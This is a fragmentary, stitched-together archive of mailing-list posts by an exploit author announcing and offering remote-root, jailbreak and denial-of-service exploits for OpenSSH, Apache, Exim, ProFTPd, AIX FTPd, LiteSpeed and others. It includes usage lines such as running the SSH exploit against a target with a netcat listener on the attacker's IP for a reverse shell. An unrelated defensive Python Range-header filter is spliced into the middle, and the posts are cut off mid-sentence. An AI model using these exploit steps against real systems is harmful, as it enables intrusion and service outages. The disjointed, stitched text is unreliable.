Hello lists,
you can view my slide notes for my talk entitled Uncovering
Zero-Days and advanced fuzzing held at AthCon 2012 at the following
places:
http://www.isowarez.de/
http://kingcope.wordpress.com/
Cheerio,
/Kingcope
Everything reachable has been reached - Mission accomplished.
There won't be any public releases going by the nickname KingCope in
the future.
I have one last present for you.
http://www.youtube.com/watch?v=-mgf7dqg7zM
( My Secrets Inside (tm) )
/Kingcope
, to the shame files...
On 18 January 2012 08:11, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Demonstration of the Exploit:
http://www.youtube.com/watch?v=78nAxh70yZE (thanks ClsHack)
see attached content
/Kingcope
On 20 January 2012 00:28, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Hello xD,
sorry I don't understand a word you are talking about.
To put everything together about what you were ranting would take too
much time for me.
Did I offend you in any way ?
It's just a PoC
Demonstration of the Exploit:
http://www.youtube.com/watch?v=78nAxh70yZE (thanks ClsHack)
see attached content
/Kingcope
/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
**
On Jan 17, 2012, at 4:11 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Demonstration of the Exploit:
http://www.youtube.com/watch?v=78nAxh70yZE (thanks ClsHack)
see attached content
/Kingcope
undeadattack.c
Hi Chris,
On 14 December 2011 08:21, Chris Evans scarybea...@gmail.com wrote:
On Tue, Dec 13, 2011 at 12:11 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Yes you are somewhat right, as this is the old discussion about if
code execution inside an ftpd
is a vulnerability
Hi,
I read through your blog post with much excitement as it seems you got
your way through
to a stable way to exploit this vulnerability, congrats to that.
Apart from the discussion on how to exploit the heap overrun I just
want to mention that
to exploit this bug in vsftpd you have to break the
-disclosure] VSFTPD Remote Heap Overrun (low severity)
To: HI-TECH . isowarez.isowarez.isowa...@googlemail.com,
dwa...@redhat.com, jo...@grok.org
Cc: full-disclosure@lists.grok.org.uk
Hi Ramon,
Frankly I didn't look into the possibility to exploit this
vulnerability,
so i do not know if it is easy
-- Forwarded message --
From: HI-TECH . isowarez.isowarez.isowa...@googlemail.com
Date: 10 December 2011 00:44
Subject: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
To: Ramon de C Valle rcva...@redhat.com
Hi Ramon,
Frankly I didn't look
This is afaik a patched CVE in Linux glibc [1] which can be triggered through
the very secure ftp daemon [2] so it will only work on older linux distros.
Be aware that vsftpd has privilege separation built in so this bug
will not yield a root shell.
It could yield root only in conjunction with a
Hi lists,
this is Kingcope
btw this exploit does not depend on the ProFTPd version
as illustrated in the youtube video below it will unlock
ProFTPd 1.3.4a too.
enjoy the hacktro!!
http://youtu.be/10uedlgNEJA
I m better than TESO!
CONFIDENTIAL SOURCE MATERIALS!
[*][*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*][*]
Affected:
220 Serv-U FTP Server
Hi lists,
sorry if I offended anyone by referring to teso,
I really like teso as you might also.
all this happened because I was drunk hehe :
I hope you enjoy this release!
On 30 November 2011 20:32, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
/* KCOPE2011 - x86/amd64 bsd
24405398b27585676f0191b493839e9c02f3ec5a file1
e676c17b21f5a96fe278c0cdb32152357d5e10f6 file2
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Hello Lists,
the youtube video at the bottom illustrates the threat quite well.
these were the exact same observations I had when initially running the tool.
It has to be noted that a good architecture can very likely mitigate the risks.
For example load balancing to multiple targets will most
Hi Michal,
What do you think from where this originated ?
Were you outlining it a while back :)
/kc
2011/8/24 Michal Zalewski lcam...@coredump.cx:
http://www.gossamer-threads.com/lists/apache/dev/401638
FWIW, I pointed out the DoS-iness of their Range handling a while ago:
the advisory
there was a patch for both Apache and IIS by limiting the maximal Byte Range
headers slightly. This is a feeling I got over years of fuzzing for httpd bugs.
Regards,
Kingcope
2011/8/24 HI-TECH . isowarez.isowarez.isowa...@googlemail.com:
Hi Michal,
What do you think from where
Yeah you are correct. It does not really matter.
It's just a DoS, things should move on.
I do that for fun, seeing things break, not more not less,
the hype on the media right now makes no difference, but
I must admit listening to Johannes Ullrich in the daily stormcast reporting
about the postings
Hello list,
oops looks like this bug has nothing to do with mod_deflate/mod_gzip,
read on here where the apache team is resolving the issue:
http://www.gossamer-threads.com/lists/apache/dev/401638
Cheers,
Kingcope
2011/8/20 Moritz Naumann secur...@moritz-naumann.com:
On 20.08.2011 00:23 HI
w00t for the youtube video and nice tune too :
2011/8/20 HI-TECH . isowarez.isowarez.isowa...@googlemail.com:
Disabling mod_gzip/mod_deflate is a workaround I guess.
2011/8/20 Moritz Naumann secur...@moritz-naumann.com:
On 20.08.2011 00:23 HI-TECH . wrote:
(see attachment)
/Kingcope
Works (too) well here. Are there any workarounds other than rate
limiting or detecting + dropping the traffic IPS
(see attachment)
/Kingcope
killapache.pl
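The workaround the thread circles around (Apache and IIS limiting the number of byte ranges per request, and Moritz's question about detecting and dropping the traffic), as an added example that is not part of the original posts and is neither killapache.pl nor Apache's own code: a small Range-header filter in Python. The sample headers are constructed here, and the limit of five ranges is an assumption chosen for this example; the overlap check is ours as well.

```python
import re
from typing import List, Optional, Tuple

# Limit on the number of byte ranges accepted per request. The value is an
# assumption for this example, not a figure from the thread.
MAX_RANGES = 5

# Constructed sample headers (not captured traffic): a normal partial-content
# request and one shaped like the overlapping-range flood under discussion.
NORMAL_RANGE = "bytes=0-499"
FLOOD_RANGE = "bytes=0-," + ",".join(f"5-{i}" for i in range(20))

_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")

RangeSpec = Tuple[Optional[int], Optional[int]]


def parse_ranges(header: str) -> Optional[List[RangeSpec]]:
    """Parse 'bytes=a-b,c-,-d' into (start, end) pairs; None means open-ended.
    Returns None for anything that is not a syntactically valid byte-range set."""
    if not header.startswith("bytes="):
        return None
    specs: List[RangeSpec] = []
    for raw in header[len("bytes="):].split(","):
        m = _RANGE_SPEC.match(raw.strip())
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        start = int(m.group(1)) if m.group(1) else None
        end = int(m.group(2)) if m.group(2) else None
        specs.append((start, end))
    return specs


def resolve(specs: List[RangeSpec], content_length: int) -> List[Tuple[int, int]]:
    """Turn specs into concrete (first, last) offsets for a body of content_length bytes.
    Unsatisfiable ranges (first > last) are dropped here, so a flood made of those
    is caught by the count check in should_drop(), not by the overlap check."""
    resolved = []
    for start, end in specs:
        if start is None:                      # suffix range "-N": the last N bytes
            first, last = max(content_length - end, 0), content_length - 1
        else:
            first = start
            last = content_length - 1 if end is None else min(end, content_length - 1)
        if first <= last:
            resolved.append((first, last))
    return resolved


def has_overlap(resolved: List[Tuple[int, int]]) -> bool:
    """True if any two ranges cover a common byte; legitimate clients do not ask for that."""
    ordered = sorted(resolved)
    return any(nxt[0] <= prev[1] for prev, nxt in zip(ordered, ordered[1:]))


def should_drop(header: Optional[str], content_length: int,
                max_ranges: int = MAX_RANGES) -> Tuple[bool, str]:
    """Decide whether a request with this Range header should be refused (and why)."""
    if not header:
        return False, "no range header"
    specs = parse_ranges(header)
    if specs is None:
        return True, "malformed range header"
    if len(specs) > max_ranges:
        return True, f"{len(specs)} ranges exceeds limit of {max_ranges}"
    if has_overlap(resolve(specs, content_length)):
        return True, "overlapping ranges"
    return False, "ok"


if __name__ == "__main__":
    for hdr in (NORMAL_RANGE, FLOOD_RANGE, "bytes=0-499,100-200", "bytes=abc"):
        print(f"{hdr[:40]:40s} -> {should_drop(hdr, 1000)}")
```

The count check runs before the overlap check on purpose: it is cheap, it needs no knowledge of the file size, and it is the only check that catches a flood built from unsatisfiable ranges, which a resolver discards before any overlap could be seen.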
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z yourip target
setup a netcat, port 443 on yourip first
a statically linked linux binary of the exploit can be found below
you can apply the patch using the diff if you don't want to run that.
2011/7/1 Benji m...@b3nji.com:
So you want people to download your statically linked binary?
On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
OpenSSH FreeBSD Remote Root Exploit
(see attachment)
Cheers,
Kingcope
ssh_preauth_freebsd
this
kind of attack to fail. In any way looking at real environments this kind
of attack WILL succeed, not everywhere sure, but that's not what I
was stating
in the advisory.
-kc
2011/6/19 Moritz Naumann secur...@moritz-naumann.com:
On 19.06.2011 13:35 HI-TECH . wrote:
A good and working example
?showComment=1308462489303#c952957474393688505
On Sun, 19 Jun 2011 02:58:16 +0200, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
This technique describes how to exploit apps which encode pictures
during a
Php upload. Embedding Php code inside gif files which are uploaded is a
known
I said be careful what you wish for cause you just might get it, and if you
get it then you just might not know what to do with it cause it might just
come back on you tenfold. -kc
This technique describes how to exploit apps which encode pictures during a
Php upload. Embedding Php code inside gif files which are uploaded is a
known technique to execute arbitrary code on a Apache Php installation. Now
what can one do when the code which uploads the file processes and encodes
This is a perl port of the metasploit module by Patrick Hof (redteam-pentesting)
# Exploit Title: JBoss Application Server Remote Exploit
# Date: March 2011
# Author: Kingcope
# Version: 4.* 5.*
# Tested on: Linux / Windows
# CVE : CVE-2010-0738
This email was sent from an internet cafe :
MacOS X FTP Server 0day
it was my finding, who carez
ftp target
get ...tar
will retrieve all contents of underlying folder of user ftp. (hint:
works with correct user account in latest NcFTPD too)
ftp ls ~ftp
200 PORT command successful.
150 Opening ASCII mode data connection for /us.
/*FreeBSD = 5.4-RELEASE ftpd (Version 6.00LS) sendfile kernel mem-leak
by Kingcope
February 2011
--
kernel memory file may contain secret hashes and more..
tested on FreeBSD 5.3-RELEASE
reference: FreeBSD-SA-05:02.sendfile
*/
/Kingcope
# Exploit Title: FreeBSD local denial of service - forced reboot
# Date: 28. January 2011
# Author: Kingcope
# Software Link: http://www.freebsd.org
# Operating System: FreeBSD
# Tested on: 8.0-RELEASE
This source code when compiled and executed
will reboot at least FreeBSD 8.0-RELEASE because of
Phrack and the blackhats.
You are an army I am one.
The only lasting.
I am your conscience.
I am always behind you,
every day from morning to late,
I am near you
no matter
where you go
I'm the bad feeling
that you get the one or the other day.
And you without difficulty
Simply push aside
On
See attached exploit,
Kingcope
SimpleClient.java
(see attachment)
signed,
Kingcope
eximxpl.pl
New version drops into root.
The prior version was broken.
(see attachment)
signed,
Kingcope
eximxpl.pl
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard
(see attachment)
signed,
Kingcope
proremote.pl
care about a DOS.
On Fri, Oct 1, 2010 at 10:23 AM, Jacky Jack jacksonsmth...@gmail.com wrote:
Are you trying to Pwn$ G33ks here?
On Fri, Oct 1, 2010 at 8:41 AM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
vulnerability description is attached to this email
Since it's public now I attached the original exploit with original headers.
Greetings,
Kingcope
2010/8/19 HI-TECH . isowarez.isowarez.isowa...@googlemail.com
Watch the Hacktro at
http://www.youtube.com/watch?v=uavlQV2FTjU
Cheers,
Kingcope
freebsd-cache.c
Hello List,
sry ppl - it needed some fixes and the exploit is now much more stable.
(see attachment)
Best Regards,
Kingcope
aix.c
.
Cheers!
Kingcope
2010/7/18 HI-TECH . isowarez.isowarez.isowa...@googlemail.com
(SEE ATTACHMENT)
---
Bad luck wind been blowin' on my back
I was born to bring trouble wherever I'm at
With the number '13' tattooed on my neck
That ink starts to itch
Black gon' turn to red
I was born
Attached is another version of my AIX 5l FTPd exploit written in C to be
more portable and powerful between hosts :
The Exploit in action:
[r...@vs2067037 kcope]# ./aix -h ftp.ABABABABABA.edu -i 85.25.67.37 -c
jkateley
220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
(SEE ATTACHMENT)
---
Bad luck wind been blowin' on my back
I was born to bring trouble wherever I'm at
With the number '13' tattooed on my neck
That ink starts to itch
Black gon' turn to red
I was born in the soul of misery
And I never had me a name
They just give me a number when I was young
Litespeed Technologies Web Server Remote Poison null byte Zero-Day
discovered and exploited by Kingcope in June 2010
Google gives me over 9 million hits
Example exploit session:
%nc 192.168.2.19 80
HEAD / HTTP/1.0
HTTP/1.0 200 OK
Date: Sun, 13 Jun 2010 00:10:38 GMT
Server: LiteSpeed
f3838b30c0aaf8aea00ccb19ad96947eba413d7a c.pl